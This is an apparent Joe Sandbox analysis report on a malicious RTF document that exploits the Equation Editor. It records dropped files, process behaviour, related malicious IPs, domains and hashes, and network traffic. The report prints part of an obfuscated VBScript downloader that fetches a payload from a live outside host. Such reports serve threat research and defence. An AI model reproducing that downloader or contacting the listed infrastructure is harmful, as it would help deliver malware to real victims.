Execution Graph export aborted for target powershell.exe, PID 3200 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
05:08:38	API Interceptor	283x Sleep call for process: EQNEDT32.EXE modified
05:08:41	API Interceptor	54x Sleep call for process: wscript.exe modified
05:08:42	API Interceptor	13x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
23.95.235.16	DHL_AWB 98776013276.xls	Get hash	malicious	FormBook	Browse	23.95.235.16/33011/WDF.txt
	FedEx Receipt_53065724643.xls	Get hash	malicious	FormBook	Browse	23.95.235.16/88077/BNNJ.txt
	statement .xls	Get hash	malicious	Unknown	Browse	23.95.235.16/99122/innovationflowerpicturetoday.gif
	IlWPStOFHj.rtf	Get hash	malicious	Remcos	Browse	23.95.235.16/xampp/kob/MMD.txt
	LgTFM1JlJu.rtf	Get hash	malicious	AgentTesla	Browse	23.95.235.16/5656/rcc.txt
	zBtnT85tsF.rtf	Get hash	malicious	HTMLPhisher	Browse	23.95.235.16/9088/lionsarejunglelivingalwaysthere.bmp
	SC_TR20240619.xls	Get hash	malicious	AgentTesla	Browse	23.95.235.16/9088/UHH.txt
	TransferNotice_Technoglass_SA_P240408-6K27VGO.js	Get hash	malicious	Unknown	Browse	23.95.235.16/9022/RVG.txt
	vcb_#20240618000.xls	Get hash	malicious	Unknown	Browse	23.95.235.16/9022/cfo/cbc.doc
	vcb_#20240618000.xls	Get hash	malicious	Unknown	Browse	23.95.235.16/9022/cfo/cbc.doc
188.114.96.3	Adjunto confirmacion de pedido.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.coinwab.com/kqqj/
	aAEsSBx24sxHhRz.exe	Get hash	malicious	FormBook	Browse	www.camperelektrikde.shop/dy13/?GdIHAFZ=8bNdgr3QvPw6/pDIZNt+55DvjzemDI0RO+pYD3qlulbIe6f7Sn3K06Z4F4Tg3hK83Y0/&BhU=5jl0ddZhNnYlOrV0
	http://sp.26skins.com/steamstore/category/adventure_rpg/?snr=1_5_9__12	Get hash	malicious	Unknown	Browse	sp.26skins.com/favicon.ico
	30Fqen2Bu3.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/TbaYPT0S/download
	30Fqen2Bu3.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/TbaYPT0S/download
	Vg46FzGtNo.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	000366cm.nyashka.top/phpflowergenerator.php
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	filetransfer.io/data-package/mHgyHEv5/download
	file.exe	Get hash	malicious	FormBook	Browse	www.cavetta.org.mt/yhnb/
	http://johnlewisfr.com	Get hash	malicious	Unknown	Browse	johnlewisfr.com/
	cL7A9wGE3w.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	445798cm.nyashka.top/ProviderEternalLinephpRequestSecurePacketprocessauthwordpress.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
uploaddeimagens.com.br	DHL_AWB 98776013276.xls	Get hash	malicious	FormBook	Browse	188.114.96.3
	orden de compra.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	188.114.96.3
	FedEx Receipt_53065724643.xls	Get hash	malicious	FormBook	Browse	188.114.96.3
	zahtjev za ponudu.xls	Get hash	malicious	Unknown	Browse	188.114.97.3
	INQUIRY#809676-JULY1.xla.xlsx	Get hash	malicious	Unknown	Browse	188.114.96.3
	SecuriteInfo.com.Exploit.ShellCode.69.26008.28945.rtf	Get hash	malicious	Remcos	Browse	188.114.96.3
	SecuriteInfo.com.Exploit.ShellCode.69.25469.24539.rtf	Get hash	malicious	Unknown	Browse	188.114.96.3
	gFTk7fAh55.rtf	Get hash	malicious	Unknown	Browse	188.114.97.3
	Comprobante_786765456776780879878968.vbs	Get hash	malicious	AgentTesla	Browse	188.114.97.3
	Product Inquiry_#466788.xls	Get hash	malicious	FormBook	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
THEZONEBG	02_07_2024_D#U00f6nemi_MEVDUAT Ekstre Bilgiler.exe	Get hash	malicious	AsyncRAT	Browse	91.92.240.178
	JrBo2dgrUX.exe	Get hash	malicious	Lokibot	Browse	91.92.240.69
	DHL_AWB 98776013276.xls	Get hash	malicious	FormBook	Browse	91.92.254.14
	457525.xls	Get hash	malicious	Unknown	Browse	91.92.254.14
	Scan-Payment-Advice.xls	Get hash	malicious	Lokibot	Browse	91.92.240.69
	dk3M4juckj.exe	Get hash	malicious	DanaBot	Browse	91.92.246.63
	dk3M4juckj.exe	Get hash	malicious	DanaBot	Browse	91.92.246.63
	je7RnKrgQO.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	91.92.255.36
	List of Required items and services.zip	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	91.92.242.245
	YE40Payment3-R30819-38AIEY-39POIA-29102ND-K5920O-AO30382.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	91.92.255.36
AS-COLOCROSSINGUS	Payment_Advice.xls	Get hash	malicious	Unknown	Browse	192.3.179.150
	DHL_AWB 98776013276.xls	Get hash	malicious	FormBook	Browse	23.95.235.16
	Scan-Payment-Advice.xls	Get hash	malicious	Lokibot	Browse	198.46.178.137
	orden de compra.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	192.3.243.156
	ORDER-7019-2024.js	Get hash	malicious	AgentTesla	Browse	192.210.215.11
	PO-24701248890.js	Get hash	malicious	WSHRat	Browse	192.210.215.11
	FedEx Receipt_53065724643.xls	Get hash	malicious	FormBook	Browse	23.95.235.16
	statement .xls	Get hash	malicious	Unknown	Browse	23.95.235.16
	EY8qnRKXcx.rtf	Get hash	malicious	Lokibot	Browse	198.46.178.137
	Scan_Hsbc_Payment_advice.xls	Get hash	malicious	Lokibot	Browse	198.46.178.137
CLOUDFLARENETUS	HSBCscancopy-invoice778483-payment87476MT103.exe	Get hash	malicious	FormBook	Browse	104.21.21.230
	https://www.mediafire.com/file/9gqqmzveuoh1gqc/Confirmation+of+Payment.tgz/file	Get hash	malicious	AgentTesla	Browse	104.16.113.74
	#U00f6deme makbuzunu onayla.exe	Get hash	malicious	Lokibot	Browse	104.21.76.60
	PI and payment confirmed pdf.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	https://developers.foxit.com/	Get hash	malicious	Unknown	Browse	104.26.9.44
	https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//bgvhdjcbjfdhjkbgfddgfghgfd.pages.dev/#?email=dGVzdEB0ZXN0by5jb20=	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	_Account Receipt.PDF.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	https://hr.economictimes.indiatimes.com/etl.php?url=https://hr.economictimes.indiatimes.com/etl.php?url=//bgvhdjcbjfdhjkbgfddgfghgfd.pages.dev/#?email=dGVzdEB0ZXN0by5jb20=	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://links-1.govdelivery.com/CL0/https:%2F%2Fapps.twc.texas.gov%2FUITAXSERV%2Fsecurity%2Flogon.do/1/010001906eac4a95-b32fd906-841f-4d3d-bf3f-0569a7b84779-000000/O1ha5mDxEioEFSm7quIZI3ZzUwAXbJrANNcKESvCj7U=359	Get hash	malicious	Unknown	Browse	1.1.1.1
	http://www.splendidcare.sa.com/Juwqdh/xacwk5957irfeugd/FW2HGOqFbIVQssWaWxsuPFbxoA78Qv8umKJQmKBGMM0/enpkwYwNDdxjXCgjy64rbJkHYw5eTv2C-VSAAV3Fufzkb2cfb573zE5R9OTtHCML20yl9BXVgVz_5eGAS31RGQ	Get hash	malicious	Unknown	Browse	104.17.2.184

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	Payment_Advice.xls	Get hash	malicious	Unknown	Browse	188.114.96.3
	DHL_AWB 98776013276.xls	Get hash	malicious	FormBook	Browse	188.114.96.3
	orden de compra.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	188.114.96.3
	FedEx Receipt_53065724643.xls	Get hash	malicious	FormBook	Browse	188.114.96.3
	statement .xls	Get hash	malicious	Unknown	Browse	188.114.96.3
	Bank Slip 2.doc	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Scan_Hsbc_Payment_advice.xls	Get hash	malicious	Lokibot	Browse	188.114.96.3
	INQUIRY#809676-JULY1.xla.xlsx	Get hash	malicious	Remcos	Browse	188.114.96.3
	20240506_12082.xls	Get hash	malicious	Unknown	Browse	188.114.96.3
	INQUIRY#809676-JULY1.xla.xlsx	Get hash	malicious	Remcos	Browse	188.114.96.3

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greatideaforfollowers[1].gz

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	3490
Entropy (8bit):	3.6988434778887034
Encrypted:	false
SSDEEP:	96:g0kltIiY6Yij0kltRET8yT8LT8VH0klt+T80:5stIiei4stOR8+Ust+j
MD5:	397C3C538435534590D14E1F5C9149C6
SHA1:	00D4EF9859A20F9CBC444A7AB4E6EDF9BE4D19FB
SHA-256:	1F0991AE33597D73D6CF48C3ED6BECE4423BF2393A4E85EB1B84DFE773CD734F
SHA-512:	A8AF6B3E116C8C1CFEF703F88C8798DC095D448664A57C1B6D9589CB6330C3F18835C1DAD49810CA59667695696E374FE24F2DCFB325BAB6E819FBFE57F3C996
Malicious:	false
Reputation:	low
Preview:	..D.i.m. .i.L.G.L.p.Z.L.Q.G.K.J.N.c.b.K.P.c.q.Z.N.P.c.k.N.G.K.N.P.u.n.K.N.a.c.v.K.Z.K.n.d.G.L.Z.K.a.W.W.C.L.f.k.l.P.c.m.b.n.a.L.W.h.N.I.Z.a.Q.c.t.k.J.W.G.B.c.d.l.U.i.Z.W.A.h.x.L.Q.d.K.l.R.B.A.i.L.f.J.K.K.Q.c.W.,. .R.v.g.o.z.C.N.L.B.U.O.L.A.l.G.W.d.e.L.p.u.G.p.W.q.r.P.B.c.c.u.i.t.b.G.W.f.W.k.R.u.U.z.K.O.x.x.R.i.o.U.K.W.a.L.B.W.p.S.U.v.B.T.c.S.q.n.b.f.Z.o.W.b.p.P.k.Z.d.N.q.L.j.c.L.Z.G.a.i.G.G.a.W.r.i.G.e.d.A.z.i.....S.e.t. .i.L.G.L.p.Z.L.Q.G.K.J.N.c.b.K.P.c.q.Z.N.P.c.k.N.G.K.N.P.u.n.K.N.a.c.v.K.Z.K.n.d.G.L.Z.K.a.W.W.C.L.f.k.l.P.c.m.b.n.a.L.W.h.N.I.Z.a.Q.c.t.k.J.W.G.B.c.d.l.U.i.Z.W.A.h.x.L.Q.d.K.l.R.B.A.i.L.f.J.K.K.Q.c.W. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".M.S.X.M.L.2...S.e.r.v.e.r.X.M.L.H.T.T.P.".).....i.L.G.L.p.Z.L.Q.G.K.J.N.c.b.K.P.c.q.Z.N.P.c.k.N.G.K.N.P.u.n.K.N.a.c.v.K.Z.K.n.d.G.L.Z.K.a.W.W.C.L.f.k.l.P.c.m.b.n.a.L.W.h.N.I.Z.a.Q.c.t.k.J.W.G.B.c.d.l.U.i.Z.W.A.h.x.L.Q.d.K.l.R.B.A.i.L.f.J.K.K.Q.c.W...O.p.e.n. .".G.E.T.".,. .".h.t.t.p.:././.9.1...9.2...2.5.4...2.9./.U.s.e.r.s._.A.P.I./.s.y.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{89CD6143-AF39-4DB2-BD0A-77C70AFAF6C5}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	CE338FE6899778AACFC28414F2D9498B
SHA1:	897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
SHA-256:	4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
SHA-512:	6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6541E432-FCF8-462E-B89E-94C2D4EFD985}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	14336
Entropy (8bit):	3.6042375496492554
Encrypted:	false
SSDEEP:	384:VuVdKRL2/9Uja4gTYckw/OEjqay7B6vfGuv/N6QFLggpvi7iLJ:QmyFU+F6A9jit6vOEgaZvBJ
MD5:	507E181B72FB351F53791A9966347D20
SHA1:	E9FF7C875EE16ABC6F5E14F8F8AF1F0FE13F1ABF
SHA-256:	FE9E7B953C2FEE16F5C923A36CBD71858E8ACC8A9985F1720441D99709455040
SHA-512:	2617F14C967C1D3532E74B30AF8C8136AA0DCB8F3D659026793FB63F53735EB0B8CFF78BF5074B22A0EC9B9C4BA547DA7FA2FC6644941794DE745826CA31BE25
Malicious:	false
Reputation:	low
Preview:	....\.9.5.5.3.7.7.1.7.#.2.#.].=.?...?.$.;.`.^.~.?.9.^.&.2.0.1.+.<.+.2.2.[.@...%.\|.\|.-.?._.#.?.1._.7.~.5.].%.!.;.>.^.5.7.6.>.?.[.).!.#.9.%.?.,./...=.!.).$.0.9.9.0.#.(.$.0.6.-.6.?.9.^.].=.?.$.[.2./.2.).!.2.[.,._.).?.,.8.\|.6.?...?.#.].....1.&...`...).<.?.4.&.].?.1.;...%.?.~.:./...........=.>...-.5.5.7...%.=.^.=..%.%.1.2.].\|.~.,.=.`.9.[.1.,.?.$.?.5.5.$.?.'.[.:.8.6.=.?.+.(.=._.[._.5.4.[./.3.:...%.?.?.].;.^.8.=./.0.+.7.?..^.#.>.&._.&.=.,.?.\|.@.!...?.-.0.?.-.~.?.5.&.:....0.>.$.$.?.~.].@.1.$.4.4.`...2.^.1.&.!.3...).$.;.;.:.&./.?.7.?.]...<.+.:.<.@.?.?.~.[.6.?.%.`.:.%.8.3.=.$._.%...0.#.-...?.<.5.1.<.6.].;...%.]./._.?.7.;.'.<.\|.[.7.&.~.(...?.).,.=.#.0.?.\|.[.1.$.7.1.$.?.~.?..;.8.9.<.?.~.<.6.3.?.2.&..[.!.(.'.&.$.3.;.....?.\|.@.?.>.+...?...&.#...-.7.?.?.).%.-.?.;.]...0.<...~...6.0.@.>.@.=.?.6.?.0.6.,._.?.5.9.`._.^.?.~.#..].=.<..>.4.'.+.<.'.5.\|.].\|.[.6...?./...\|.<.6.8.0.[.@.?.(./.?.1.^.,.:.@.\|./.?./.%.?.=...%...:.?...-...6.=.?...?..5.1.*.$.?.&.?.].\|.>.-.1.'.7.~.3.9...;.\|.%.(.(.@.1.[.4.?.4.6.6.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F0D9C1B9-F0D5-4902-9161-FED34811C4AD}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\iznehrzd.ier.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\vjz3rtmh.qm2.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\4YlwTsmpuZ.LNK

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:05 2023, mtime=Fri Aug 11 15:42:05 2023, atime=Wed Jul 3 08:08:36 2024, length=197186, window=hide
Category:	dropped
Size (bytes):	1014
Entropy (8bit):	4.54524586560401
Encrypted:	false
SSDEEP:	12:81mRgFgXg/XAlCPCHaXplKB5B/Dr8xX+WtT/bqsO0+/oicvbUhs4VG+/kDtZ3YiF:8sm/XTbKPxOv1u/becJB/kDv3qwtik7N
MD5:	46C8C76E3E5A22FC28944967F20E8A78
SHA1:	9410A1BAB97504122A4EFE18A58E121C74B625CC
SHA-256:	D86A4D94C0B29425B4EB8FC2C35F028BCD402E83E2AA1D495F512E28B8CD1CDB
SHA-512:	8CFE3F06E719B021F3BE53527B2B44B074ADBF3825A9F690931DB2E5F0AA1FF3C8CDFDF1B3F33DF5E807C6C636D2DC61378C32D0E9C3ABD553C8C04C1E7EE0B0
Malicious:	false
Preview:	L..................F.... .....r.....r....3u.(...B............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X.I..user.8......QK.X.X.I...&=....U...............A.l.b.u.s.....z.1......WD...Desktop.d......QK.X.WD...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2.B....X.I .4YLWTS~1.RTF..J.......WC..WC..........................4.Y.l.w.T.s.m.p.u.Z...r.t.f.......x...............-...8...[............?J......C:\Users\..#...................\\506013\Users.user\Desktop\4YlwTsmpuZ.rtf.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.4.Y.l.w.T.s.m.p.u.Z...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......506013..........D_....3N...W...9.W.e8...8.....[D_....3N...W...9.W.e8

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Generic INItialization configuration [folders]
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.626636531627805
Encrypted:	false
SSDEEP:	3:H3Ji6/om4H6/ov:H3h/v/y
MD5:	5BDAD84EF82636D5736842972516F162
SHA1:	2C47CB9A1C4A9C2550FA2D08402298542C2EE4A5
SHA-256:	CE60D29C370CE2649270C029F62D93CAE20DA481C791F92E1949AA5EE8C639E2
SHA-512:	86B332FE006E8F542C4B7CD920AC2686A264597FD1C249376524D3C994E14BFB2C3D28B4905E6B26D3DC40806C40C9B0649D9FA0026CCEE15625818EDFB45582
Malicious:	false
Preview:	[misc]..4YlwTsmpuZ.LNK=0..[folders]..4YlwTsmpuZ.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020307
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
MD5:	2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
SHA1:	95E13378EA9CACA068B2687F01E9EF13F56627C2
SHA-256:	60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
SHA-512:	2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	3490
Entropy (8bit):	3.6988434778887034
Encrypted:	false
SSDEEP:	96:g0kltIiY6Yij0kltRET8yT8LT8VH0klt+T80:5stIiei4stOR8+Ust+j
MD5:	397C3C538435534590D14E1F5C9149C6
SHA1:	00D4EF9859A20F9CBC444A7AB4E6EDF9BE4D19FB
SHA-256:	1F0991AE33597D73D6CF48C3ED6BECE4423BF2393A4E85EB1B84DFE773CD734F
SHA-512:	A8AF6B3E116C8C1CFEF703F88C8798DC095D448664A57C1B6D9589CB6330C3F18835C1DAD49810CA59667695696E374FE24F2DCFB325BAB6E819FBFE57F3C996
Malicious:	true
Preview:	..D.i.m. .i.L.G.L.p.Z.L.Q.G.K.J.N.c.b.K.P.c.q.Z.N.P.c.k.N.G.K.N.P.u.n.K.N.a.c.v.K.Z.K.n.d.G.L.Z.K.a.W.W.C.L.f.k.l.P.c.m.b.n.a.L.W.h.N.I.Z.a.Q.c.t.k.J.W.G.B.c.d.l.U.i.Z.W.A.h.x.L.Q.d.K.l.R.B.A.i.L.f.J.K.K.Q.c.W.,. .R.v.g.o.z.C.N.L.B.U.O.L.A.l.G.W.d.e.L.p.u.G.p.W.q.r.P.B.c.c.u.i.t.b.G.W.f.W.k.R.u.U.z.K.O.x.x.R.i.o.U.K.W.a.L.B.W.p.S.U.v.B.T.c.S.q.n.b.f.Z.o.W.b.p.P.k.Z.d.N.q.L.j.c.L.Z.G.a.i.G.G.a.W.r.i.G.e.d.A.z.i.....S.e.t. .i.L.G.L.p.Z.L.Q.G.K.J.N.c.b.K.P.c.q.Z.N.P.c.k.N.G.K.N.P.u.n.K.N.a.c.v.K.Z.K.n.d.G.L.Z.K.a.W.W.C.L.f.k.l.P.c.m.b.n.a.L.W.h.N.I.Z.a.Q.c.t.k.J.W.G.B.c.d.l.U.i.Z.W.A.h.x.L.Q.d.K.l.R.B.A.i.L.f.J.K.K.Q.c.W. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".M.S.X.M.L.2...S.e.r.v.e.r.X.M.L.H.T.T.P.".).....i.L.G.L.p.Z.L.Q.G.K.J.N.c.b.K.P.c.q.Z.N.P.c.k.N.G.K.N.P.u.n.K.N.a.c.v.K.Z.K.n.d.G.L.Z.K.a.W.W.C.L.f.k.l.P.c.m.b.n.a.L.W.h.N.I.Z.a.Q.c.t.k.J.W.G.B.c.d.l.U.i.Z.W.A.h.x.L.Q.d.K.l.R.B.A.i.L.f.J.K.K.Q.c.W...O.p.e.n. .".G.E.T.".,. .".h.t.t.p.:././.9.1...9.2...2.5.4...2.9./.U.s.e.r.s._.A.P.I./.s.y.

C:\Users\user\Desktop\~$lwTsmpuZ.rtf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020307
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
MD5:	2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
SHA1:	95E13378EA9CACA068B2687F01E9EF13F56627C2
SHA-256:	60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
SHA-512:	2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

Static File Info

General

File type:	Rich Text Format data, version 1
Entropy (8bit):	2.208657330150951
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	4YlwTsmpuZ.rtf
File size:	197'186 bytes
MD5:	9904916ce3549610216e99d83e7e2135
SHA1:	d5eefab14ee9d5afa6258d3b399b46f779a56901
SHA256:	a887cfb81844497f8f88e558289f89d8edb3f277f142df636f5267cc8263d198
SHA512:	80394d4188c11d8eac637e3d498ee15847ebf362740663092214eb7a102cf49fd1ef6bda6e39a1ec40b86f127f105ac165aebe406a14ed1b6780a99c438e0b28
SSDEEP:	6144:fGozULk4BPR11NU9TlhrCoSHvE+QO5Sk7:M
TLSH:	DB145D2EE70F0958DF55A7B7435A4A4A06FCB33DB34140B179AC973437AD82E4A6287C
File Content Preview:	{\rtf1.......{\\fldinst514321024 \\|}.{\595537717#2#]=?.?$;`^~?9^&201+<+22[@.%\|\|-?_#?1_7~5]%!;>^576>?[)!#9%?,/.=!)$0990#($06-6?9^]=?$[2/2)!2[,_)?,8\|6?.?#]..1&.`.)<?4&]?1;.%?~:/.....=>.-557.%=^=%%12]\|~,=`9[1,?$?55$?'[:86=?+(=_[_54[/3:.%??];^8=/0+7?*^#>&_&

File Icon


Icon Hash:	2764a3aaaeb7bdbf

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	00001ADDh								no

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/03/24-11:08:43.238447	TCP	2049038	ET TROJAN Malicious Base64 Encoded Payload In Image	80	49162	91.92.254.29	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 3, 2024 11:08:41.733712912 CEST	49161	80	192.168.2.22	23.95.235.16
Jul 3, 2024 11:08:41.738675117 CEST	80	49161	23.95.235.16	192.168.2.22
Jul 3, 2024 11:08:41.738780975 CEST	49161	80	192.168.2.22	23.95.235.16
Jul 3, 2024 11:08:41.739130020 CEST	49161	80	192.168.2.22	23.95.235.16
Jul 3, 2024 11:08:41.744010925 CEST	80	49161	23.95.235.16	192.168.2.22
Jul 3, 2024 11:08:42.209574938 CEST	80	49161	23.95.235.16	192.168.2.22
Jul 3, 2024 11:08:42.209592104 CEST	80	49161	23.95.235.16	192.168.2.22
Jul 3, 2024 11:08:42.209610939 CEST	80	49161	23.95.235.16	192.168.2.22
Jul 3, 2024 11:08:42.209621906 CEST	80	49161	23.95.235.16	192.168.2.22
Jul 3, 2024 11:08:42.209706068 CEST	49161	80	192.168.2.22	23.95.235.16
Jul 3, 2024 11:08:42.209882021 CEST	49161	80	192.168.2.22	23.95.235.16
Jul 3, 2024 11:08:42.543200016 CEST	49162	80	192.168.2.22	91.92.254.29
Jul 3, 2024 11:08:42.548134089 CEST	80	49162	91.92.254.29	192.168.2.22
Jul 3, 2024 11:08:42.548201084 CEST	49162	80	192.168.2.22	91.92.254.29
